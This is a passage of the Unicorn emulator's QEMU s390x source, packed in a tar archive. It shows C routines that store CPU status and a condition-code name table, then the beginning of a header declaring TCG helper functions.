env->cregs[11] + 1, wp_flags, NULL); } else { /* Default case, create a single watchpoint. */ cpu_watchpoint_insert(cs, env->cregs[10], env->cregs[11] - env->cregs[10] + 1, wp_flags, NULL); } } typedef struct SigpSaveArea { uint64_t fprs[16]; /* 0x0000 */ uint64_t grs[16]; /* 0x0080 */ PSW psw; /* 0x0100 */ uint8_t pad_0x0110[0x0118 - 0x0110]; /* 0x0110 */ uint32_t prefix; /* 0x0118 */ uint32_t fpc; /* 0x011c */ uint8_t pad_0x0120[0x0124 - 0x0120]; /* 0x0120 */ uint32_t todpr; /* 0x0124 */ uint64_t cputm; /* 0x0128 */ uint64_t ckc; /* 0x0130 */ uint8_t pad_0x0138[0x0140 - 0x0138]; /* 0x0138 */ uint32_t ars[16]; /* 0x0140 */ uint64_t crs[16]; /* 0x0384 */ } SigpSaveArea; QEMU_BUILD_BUG_ON(sizeof(SigpSaveArea) != 512); int s390_store_status(S390CPU *cpu, hwaddr addr, bool store_arch) { static const uint8_t ar_id = 1; SigpSaveArea *sa; hwaddr len = sizeof(*sa); int i; sa = cpu_physical_memory_map(CPU(cpu)->as, addr, &len, true); if (!sa) { return -EFAULT; } if (len != sizeof(*sa)) { cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, 0); return -EFAULT; } if (store_arch) { cpu_physical_memory_write(CPU(cpu)->as, offsetof(LowCore, ar_access_id), &ar_id, 1); } for (i = 0; i < 16; ++i) { sa->fprs[i] = cpu_to_be64(*get_freg(&cpu->env, i)); } for (i = 0; i < 16; ++i) { sa->grs[i] = cpu_to_be64(cpu->env.regs[i]); } sa->psw.addr = cpu_to_be64(cpu->env.psw.addr); sa->psw.mask = cpu_to_be64(get_psw_mask(&cpu->env)); sa->prefix = cpu_to_be32(cpu->env.psa); sa->fpc = cpu_to_be32(cpu->env.fpc); sa->todpr = cpu_to_be32(cpu->env.todpr); sa->cputm = cpu_to_be64(cpu->env.cputm); sa->ckc = cpu_to_be64(cpu->env.ckc >> 8); for (i = 0; i < 16; ++i) { sa->ars[i] = cpu_to_be32(cpu->env.aregs[i]); } for (i = 0; i < 16; ++i) { sa->crs[i] = cpu_to_be64(cpu->env.cregs[i]); } cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, len); return 0; } typedef struct SigpAdtlSaveArea { uint64_t vregs[32][2]; /* 0x0000 */ uint8_t pad_0x0200[0x0400 - 0x0200]; /* 0x0200 */ uint64_t gscb[4]; /* 0x0400 */ uint8_t pad_0x0420[0x1000 - 0x0420]; /* 0x0420 */ } SigpAdtlSaveArea; QEMU_BUILD_BUG_ON(sizeof(SigpAdtlSaveArea) != 4096); #define ADTL_GS_MIN_SIZE 2048 /* minimal size of adtl save area for GS */ int s390_store_adtl_status(S390CPU *cpu, hwaddr addr, hwaddr len) { SigpAdtlSaveArea *sa; hwaddr save = len; int i; sa = cpu_physical_memory_map(CPU(cpu)->as, addr, &save, true); if (!sa) { return -EFAULT; } if (save != len) { cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, 0); return -EFAULT; } if (s390_has_feat(cpu->env.uc, S390_FEAT_VECTOR)) { for (i = 0; i < 32; i++) { sa->vregs[i][0] = cpu_to_be64(cpu->env.vregs[i][0]); sa->vregs[i][1] = cpu_to_be64(cpu->env.vregs[i][1]); } } if (s390_has_feat(cpu->env.uc, S390_FEAT_GUARDED_STORAGE) && len >= ADTL_GS_MIN_SIZE) { for (i = 0; i < 4; i++) { sa->gscb[i] = cpu_to_be64(cpu->env.gscb[i]); } } cpu_physical_memory_unmap(CPU(cpu)->as, sa, len, 1, len); return 0; } const char *cc_name(enum cc_op cc_op) { static const char * const cc_names[] = { [CC_OP_CONST0] = "CC_OP_CONST0", [CC_OP_CONST1] = "CC_OP_CONST1", [CC_OP_CONST2] = "CC_OP_CONST2", [CC_OP_CONST3] = "CC_OP_CONST3", [CC_OP_DYNAMIC] = "CC_OP_DYNAMIC", [CC_OP_STATIC] = "CC_OP_STATIC", [CC_OP_NZ] = "CC_OP_NZ", [CC_OP_LTGT_32] = "CC_OP_LTGT_32", [CC_OP_LTGT_64] = "CC_OP_LTGT_64", [CC_OP_LTUGTU_32] = "CC_OP_LTUGTU_32", [CC_OP_LTUGTU_64] = "CC_OP_LTUGTU_64", [CC_OP_LTGT0_32] = "CC_OP_LTGT0_32", [CC_OP_LTGT0_64] = "CC_OP_LTGT0_64", [CC_OP_ADD_64] = "CC_OP_ADD_64", [CC_OP_ADDU_64] = "CC_OP_ADDU_64", [CC_OP_ADDC_64] = "CC_OP_ADDC_64", [CC_OP_SUB_64] = "CC_OP_SUB_64", [CC_OP_SUBU_64] = "CC_OP_SUBU_64", [CC_OP_SUBB_64] = "CC_OP_SUBB_64", [CC_OP_ABS_64] = "CC_OP_ABS_64", [CC_OP_NABS_64] = "CC_OP_NABS_64", [CC_OP_ADD_32] = "CC_OP_ADD_32", [CC_OP_ADDU_32] = "CC_OP_ADDU_32", [CC_OP_ADDC_32] = "CC_OP_ADDC_32", [CC_OP_SUB_32] = "CC_OP_SUB_32", [CC_OP_SUBU_32] = "CC_OP_SUBU_32", [CC_OP_SUBB_32] = "CC_OP_SUBB_32", [CC_OP_ABS_32] = "CC_OP_ABS_32", [CC_OP_NABS_32] = "CC_OP_NABS_32", [CC_OP_COMP_32] = "CC_OP_COMP_32", [CC_OP_COMP_64] = "CC_OP_COMP_64", [CC_OP_TM_32] = "CC_OP_TM_32", [CC_OP_TM_64] = "CC_OP_TM_64", [CC_OP_NZ_F32] = "CC_OP_NZ_F32", [CC_OP_NZ_F64] = "CC_OP_NZ_F64", [CC_OP_NZ_F128] = "CC_OP_NZ_F128", [CC_OP_ICM] = "CC_OP_ICM", [CC_OP_SLA] = "CC_OP_SLA", [CC_OP_FLOGR] = "CC_OP_FLOGR", [CC_OP_LCBB] = "CC_OP_LCBB", [CC_OP_VC] = "CC_OP_VC", }; return cc_names[cc_op]; } ����������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/helper.h������������������������������������������������������������0000664�0000000�0000000�00000053702�14675241067�0017766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(uc_s390x_exit, void, env) DEF_HELPER_2(exception, noreturn, env, i32) DEF_HELPER_2(data_exception, noreturn, env, i32) DEF_HELPER_FLAGS_4(nc, TCG_CALL_NO_WG, i32, env, i32, i64, i64) DEF_HELPER_FLAGS_4(oc, TCG_CALL_NO_WG, i32, env, i32, i64, i64) DEF_HELPER_FLAGS_4(xc, TCG_CALL_NO_WG, i32, env, i32, i64, i64) DEF_HELPER_FLAGS_4(mvc, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(mvcin, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(clc, TCG_CALL_NO_WG, i32, env, i32, i64, i64) DEF_HELPER_3(mvcl, i32, env, i32, i32) DEF_HELPER_3(clcl, i32, env, i32, i32) DEF_HELPER_FLAGS_4(clm, TCG_CALL_NO_WG, i32, env, i32, i32, i64) DEF_HELPER_FLAGS_3(divs32, TCG_CALL_NO_WG, s64, env, s64, s64) DEF_HELPER_FLAGS_3(divu32, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(divs64, TCG_CALL_NO_WG, s64, env, s64, s64) DEF_HELPER_FLAGS_4(divu64, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_3(srst, void, env, i32, i32) DEF_HELPER_3(srstu, void, env, i32, i32) DEF_HELPER_4(clst, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(mvn, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(mvo, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(mvpg, TCG_CALL_NO_WG, i32, env, i64, i64, i64) DEF_HELPER_FLAGS_4(mvz, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_3(mvst, i32, env, i32, i32) DEF_HELPER_4(ex, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(stam, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_FLAGS_4(lam, TCG_CALL_NO_WG, void, env, i32, i64, i32) DEF_HELPER_4(mvcle, i32, env, i32, i64, i32) DEF_HELPER_4(mvclu, i32, env, i32, i64, i32) DEF_HELPER_4(clcle, i32, env, i32, i64, i32) DEF_HELPER_4(clclu, i32, env, i32, i64, i32) DEF_HELPER_3(cegb, i64, env, s64, i32) DEF_HELPER_3(cdgb, i64, env, s64, i32) DEF_HELPER_3(cxgb, i64, env, s64, i32) DEF_HELPER_3(celgb, i64, env, i64, i32) DEF_HELPER_3(cdlgb, i64, env, i64, i32) DEF_HELPER_3(cxlgb, i64, env, i64, i32) DEF_HELPER_4(cdsg, void, env, i64, i32, i32) DEF_HELPER_4(cdsg_parallel, void, env, i64, i32, i32) DEF_HELPER_4(csst, i32, env, i32, i64, i64) DEF_HELPER_4(csst_parallel, i32, env, i32, i64, i64) DEF_HELPER_FLAGS_3(aeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(adb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(axb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(seb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(sdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(sxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(deb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(ddb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(dxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(meeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(mdeb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(mdb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_5(mxb, TCG_CALL_NO_WG, i64, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_4(mxdb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_2(ldeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_4(ldxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_2(lxdb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(lxeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_3(ledb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(lexb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(ceb, TCG_CALL_NO_WG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_3(cdb, TCG_CALL_NO_WG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_5(cxb, TCG_CALL_NO_WG_SE, i32, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(keb, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_3(kdb, TCG_CALL_NO_WG, i32, env, i64, i64) DEF_HELPER_FLAGS_5(kxb, TCG_CALL_NO_WG, i32, env, i64, i64, i64, i64) DEF_HELPER_FLAGS_3(cgeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(cgdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(cgxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(cfeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(cfdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(cfxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(clgeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(clgdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(clgxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(clfeb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(clfdb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(clfxb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_3(fieb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_3(fidb, TCG_CALL_NO_WG, i64, env, i64, i32) DEF_HELPER_FLAGS_4(fixb, TCG_CALL_NO_WG, i64, env, i64, i64, i32) DEF_HELPER_FLAGS_4(maeb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(madb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(mseb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(msdb, TCG_CALL_NO_WG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_3(tceb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_3(tcdb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64) DEF_HELPER_FLAGS_4(tcxb, TCG_CALL_NO_RWG_SE, i32, env, i64, i64, i64) DEF_HELPER_FLAGS_2(sqeb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(sqdb, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_3(sqxb, TCG_CALL_NO_WG, i64, env, i64, i64) DEF_HELPER_FLAGS_1(cvd, TCG_CALL_NO_RWG_SE, i64, s32) DEF_HELPER_FLAGS_4(pack, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(pka, TCG_CALL_NO_WG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(pku, TCG_CALL_NO_WG, void, env, i64, i64, i32) DEF_HELPER_FLAGS_4(unpk, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_FLAGS_4(unpka, TCG_CALL_NO_WG, i32, env, i64, i32, i64) DEF_HELPER_FLAGS_4(unpku, TCG_CALL_NO_WG, i32, env, i64, i32, i64) DEF_HELPER_FLAGS_3(tp, TCG_CALL_NO_WG, i32, env, i64, i32) DEF_HELPER_FLAGS_4(tr, TCG_CALL_NO_WG, void, env, i32, i64, i64) DEF_HELPER_4(tre, i64, env, i64, i64, i64) DEF_HELPER_4(trt, i32, env, i32, i64, i64) DEF_HELPER_4(trtr, i32, env, i32, i64, i64) DEF_HELPER_5(trXX, i32, env, i32, i32, i32, i32) DEF_HELPER_4(cksm, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_5(calc_cc, TCG_CALL_NO_RWG_SE, i32, env, i32, i64, i64, i64) DEF_HELPER_FLAGS_2(sfpc, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_2(sfas, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_2(srnm, TCG_CALL_NO_WG, void, env, i64) DEF_HELPER_FLAGS_1(popcnt, TCG_CALL_NO_RWG_SE, i64, i64) DEF_HELPER_2(stfle, i32, env, i64) DEF_HELPER_FLAGS_2(lpq, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_2(lpq_parallel, TCG_CALL_NO_WG, i64, env, i64) DEF_HELPER_FLAGS_4(stpq, TCG_CALL_NO_WG, void, env, i64, i64, i64) DEF_HELPER_FLAGS_4(stpq_parallel, TCG_CALL_NO_WG, void, env, i64, i64, i64) DEF_HELPER_4(mvcos, i32, env, i64, i64, i64) DEF_HELPER_4(cu12, i32, env, i32, i32, i32) DEF_HELPER_4(cu14, i32, env, i32, i32, i32) DEF_HELPER_4(cu21, i32, env, i32, i32, i32) DEF_HELPER_4(cu24, i32, env, i32, i32, i32) DEF_HELPER_4(cu41, i32, env, i32, i32, i32) DEF_HELPER_4(cu42, i32, env, i32, i32, i32) DEF_HELPER_5(msa, i32, env, i32, i32, i32, i32) DEF_HELPER_FLAGS_1(stpt, TCG_CALL_NO_RWG, i64, env) DEF_HELPER_FLAGS_1(stck, TCG_CALL_NO_RWG_SE, i64, env) DEF_HELPER_FLAGS_3(probe_write_access, TCG_CALL_NO_WG, void, env, i64, i64) /* === Vector Support Instructions === */ DEF_HELPER_FLAGS_4(vll, TCG_CALL_NO_WG, void, env, ptr, i64, i64) DEF_HELPER_FLAGS_4(gvec_vpk16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpk32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpk64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpks64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vpks_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpks_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpks_cc64, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vpkls16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpkls32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vpkls64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vpkls_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpkls_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vpkls_cc64, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vperm, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(vstl, TCG_CALL_NO_WG, void, env, cptr, i64, i64) /* === Vector Integer Instructions === */ DEF_HELPER_FLAGS_4(gvec_vavg8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavg16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavgl8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vavgl16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vclz8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vclz16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vctz8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vctz16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vgfm64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vgfma64, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmal8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmal16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmah8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmah16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmae32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmale32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmao32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vmalo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlh8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlh16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vme32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmle8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmle16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmle32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vmlo32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vpopct8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vpopct16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verllv8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verllv16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verll8, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_verll16, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_verim8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_verim16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vsl, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vsra, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vsrl, TCG_CALL_NO_RWG, void, ptr, cptr, i64, i32) DEF_HELPER_FLAGS_4(gvec_vscbi8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vscbi16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_4(gvec_vtm, void, ptr, cptr, env, i32) /* === Vector String Instructions === */ DEF_HELPER_FLAGS_4(gvec_vfae8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfae16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfae32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfae_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfae_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfae_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfee8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfee16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfee32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfee_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfee_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfee_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_4(gvec_vfene8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfene16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_FLAGS_4(gvec_vfene32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, i32) DEF_HELPER_5(gvec_vfene_cc8, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfene_cc16, void, ptr, cptr, cptr, env, i32) DEF_HELPER_5(gvec_vfene_cc32, void, ptr, cptr, cptr, env, i32) DEF_HELPER_FLAGS_3(gvec_vistr8, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vistr16, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_FLAGS_3(gvec_vistr32, TCG_CALL_NO_RWG, void, ptr, cptr, i32) DEF_HELPER_4(gvec_vistr_cc8, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vistr_cc16, void, ptr, cptr, env, i32) DEF_HELPER_4(gvec_vistr_cc32, void, ptr, cptr, env, i32) DEF_HELPER_FLAGS_5(gvec_vstrc8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt8, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt16, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_FLAGS_5(gvec_vstrc_rt32, TCG_CALL_NO_RWG, void, ptr, cptr, cptr, cptr, i32) DEF_HELPER_6(gvec_vstrc_cc8, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc16, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc32, void, ptr, cptr, cptr, cptr, env, i32) DEF_HELPER_6(gvec_vstrc_cc_rt8, void, 